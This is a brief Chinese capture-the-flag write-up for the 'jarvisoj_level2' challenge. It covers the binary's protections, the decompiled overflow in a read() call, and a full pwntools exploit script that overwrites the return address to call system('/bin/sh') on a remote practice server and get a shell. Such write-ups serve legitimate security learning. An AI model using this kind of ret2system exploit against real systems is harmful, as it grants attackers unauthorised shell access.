jarvisoj_level2
检查一下文件保护
Arch: i386-32-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX enabled
PIE: No PIE (0x8048000)
32位程序,只开了nx保护,ida分析
ssize_t vulnerable_function()
{
char buf; // [esp+0h] [ebp-88h]
system("echo Input:");
return read(0, &buf, 0x100u);
}
程序也含有/bin/sh,同时这个也存在system函数,溢出后到system函数,传入/bin/sh的参,就可以getshell
from pwn import *
bin_sh = 0x804a024
r = remote('node3.buuoj.cn',27342)
elf = ELF('./jarvisoj_level2')
system_addr = elf.sym['system']
payload = 'a'*(0x88+4)+p32(system_addr)+p32(0)+p32(bin_sh)
r.sendlineafter('Input:',payload)
r.interactive()